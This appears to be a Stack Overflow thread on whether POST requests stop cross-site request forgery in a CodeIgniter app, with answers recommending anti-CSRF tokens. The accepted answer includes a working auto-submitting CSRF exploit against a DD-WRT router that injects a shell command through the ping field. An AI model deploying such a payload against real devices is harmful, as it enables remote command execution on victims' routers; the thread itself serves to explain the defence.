# PHP security using POST instead of GET to protect against XSRF?

Tags: php, security, csrf

I have some URLs like `http://mysite.com/module/45/set_name/new-name` in my application which are designed to be accessed using ajax.

In order to prevent XSRF I force such request to be `POST` requests. With `GET` it's trivial to generate a XSRF using the following:

```
<img src="http://mysite.com/module/45/set_name/new-name"/>
```

Using `POST` prevents this particular attack but is this actually any more secure than using `GET`? If not, what else can/should be done?

Thanks.

---

Edit: I'm using CodeIgniter and have the following in my config:

```
$config['csrf_protection'] = TRUE;
$config['csrf_token_name'] = 'csrf_test_name';
$config['csrf_cookie_name'] = 'csrf_cookie_name';
$config['csrf_expire'] = 3600;
```

Am I safe? Are there any downsides to having the CSRF on? Other than forms expiring after an hour?

Answer (score 3, accepted):

No chaning to post does not solve this problem.  You should read [Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet](http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet).

Here is an example Proof of Cocnept POST based CSRF exploit that I wrote.  This gives you [remote root access to DD-WRT](http://www.exploit-db.com/exploits/7389/):

```
<html>
    <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
        <input name="submit_button" value="Ping" type="hidden">
        <input name="action" value="ApplyTake" type="hidden">
        <input name="submit_type" value="start" type="hidden">
        <input name="change_action" value="gozila_cgi" type="hidden">
        <input name="next_page" value="Diagnostics.asp" type="hidden">
        <input name="ping_ip" value="echo owned">
        <input name="execute command" type="submit">
    </form>
</html>
<script>
    document.getElementById(1).submit();//remote root command execution!
</script>
```

Answer (score 4):

Using POST alone is not enough because someone can make a form with hidden input elements and automatically submit it to your website. It's not as easy as an img element with GET request but it's still possible. What you should use is some form of verification in the POST parameters, like a random value or session token that unlike cookies would not be sent in a XSRF request.

Answer (score 1):

Why don't you just check the referrer sent along with the request? Both image `src` and javascript-sent form will inform you that the request is sent from a different host and you can just block that request.

Comment: @Col. Shrapnel, do you mean image hotlinking? It's possible to allow foreign referrers for images only.

Comment: i mean fair site users who'll be unable to submit form

Comment: @Col. Shrapnel, why won't they be able to submit the form?

Comment: @Col. Shrapnel, why would it be invalid?

Comment: because this header is optional, and can be removed or changed by some software

Answer (score 0):

You're taking this problem wrong.
Your real problem is completely different - you're using improper methods.

When GET method used properly, to **retrieve data from server** no CSRF attack could be possible ever.

So, if your request alters data on the server side, you have to change it to POST anyway, despite of all these romantic and scaring things like CSRF, XSS and such.
It's just a [technology basics](http://www.w3.org/Protocols/rfc2616/rfc2616.html).

As of CSRF itself, it's not a big deal at all. Just make sure that all your forms contain some anti-csrf token (also stored in the session) and all POST form handlers do verify it.

Comment: While technically true, you do not really say anything about CSRF at all, except it being romantic and scary. CSRF is an actual security issue that should not be downplayed.

Comment: @igorw I thought that our self-appointed security expert Rook is on duty for this. Bot okay, good point, I'll add few words.